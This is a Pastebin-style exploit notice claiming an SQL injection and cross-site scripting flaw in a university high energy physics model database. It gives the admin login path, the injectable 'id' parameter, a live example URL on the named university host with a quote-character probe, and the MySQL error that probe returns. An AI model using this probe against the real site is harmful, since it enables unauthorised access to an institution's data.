KingSkrupellos

Phenodata Southampton High Energy Physics DB SQL Injection

Aug 22nd, 2019
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.57 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Phenodata University of Southampton High Energy Physics Database SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 23/08/2019
  7. # Vendor Homepage : hepmdb.soton.ac.uk
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. Phenodata University of Southampton High Energy Physics Database is prone to an SQL-injection
  24. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  25. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  26. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  27. A remote attacker can send a specially crafted request to the vulnerable application and
  28. execute arbitrary SQL commands in application`s database. Further exploitation of this
  29. vulnerability may result in unauthorized data manipulation.
  30. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  31.  
  32. ###################################################################
  33.  
  34. # Admin Panel Login Path :
  35. ************************
  36. /index.php?mod=user&act=login
  37.  
  38. # SQL Injection Exploit :
  39. **********************
  40. /index.php?mod=user&act=showmodel&id=[SQL Injection]
  41.  
  42. ###################################################################
  43.  
  44. # Example Vulnerable Sites :
  45. *************************
  46. [+] hepmdb.soton.ac.uk/index.php?mod=user&act=showmodel&id=1%27
  47.  
  48. ###################################################################
  49.  
  50. # Example SQL Database Error :
  51. ****************************
  52. Error You have an error in your SQL syntax; check the manual that corresponds to
  53. your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1
  54. in query SELECT * FROM model WHERE id=1\' LIMIT 1.
  55.  
  56. ###################################################################
  57.  
  58. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  59.  
  60. ###################################################################
Add Comment
Please, Sign In to add comment